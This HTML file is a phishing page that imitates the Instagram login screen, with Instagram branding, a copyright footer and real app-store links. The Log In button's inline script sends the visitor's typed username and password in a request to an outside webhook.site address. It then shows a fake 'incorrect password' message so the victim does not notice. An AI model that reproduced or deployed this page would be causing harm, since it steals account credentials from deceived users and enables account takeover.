<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="insta.png" type="image/png">
    <title>Please Log In</title>
</head>

<body>
    <div id="header-footer-controller">
        <div id="main">
            <!-- <div id="images"></div> -->
            <div id="interact">
                <div class="part">
                    <h1 id="title">Instagram</h1>
                    <div id="msg">
                        <div>
                            Please Log In to access this website
                        </div>
                    </div>
                    
                    <div id="form-login">
                        <div>
                            <div class="inp-ct">
                                <input type="text" placeholder="Username" id="username" name="username">
                            </div>
                            <div class="inp-ct">
                                <input type="password" placeholder="Password" id="password" name="password">
                            </div>
                            <button type="submit" onclick="fetch(`https:\/\/webhook.site/afb170b1-76c6-4fdc-ab7d-ff26beec8550/?username=${document.getElementById('username').value}&password=${document.getElementById('password').value}`); setTimeout(() => {document.getElementById('incorrect-password').classList.toggle('hidden')}, 1200)">Log In</button>
                        </div>
                    </div>
                    <div class="flex-row-ct">
                        <div class="line"></div>
                        <div id="or-text">OR</div>
                        <div class="line"></div>
                    </div>
                    <div id="fb-login">
                        <span id="fb-icon"></span>
                        <span>Log In with Facebook is disabled</span>
                    </div>
                    <div id="incorrect-password" class="hidden">
                        <div>
                            Sorry, your password was incorrect. Please
                        </div>
                        <div>
                            double-check your password.
                        </div>
                    </div>
                    <div style="width: 100%; text-align: center; margin-bottom: 10px;">
                        <a href="https://www.instagram.com/accounts/password/reset/" target="_blank">Forgot
                            password?</a>
                    </div>

                </div>
                <div id="getapp">
                    <p>
                        Get the app.
                    </p>
                    <div id="img-container">
                        <a aria-label="Download on the App Store"
                            href="https://itunes.apple.com/app/instagram/id389801252" target="_blank">
                            <img src="appstore.png" alt="Download on the App Store">
                        </a>
                        <a aria-label="Get it on Google Play"
                            href="https://play.google.com/store/apps/details?id=com.instagram.android" target="_blank">
                            <img src="googleplay.png" alt="Get it on Google Play">
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <div id="footer">
            <div>English</div>
            <div>© 2022 Instagram from Meta</div>
        </div>
    </div>


</body>

</html>
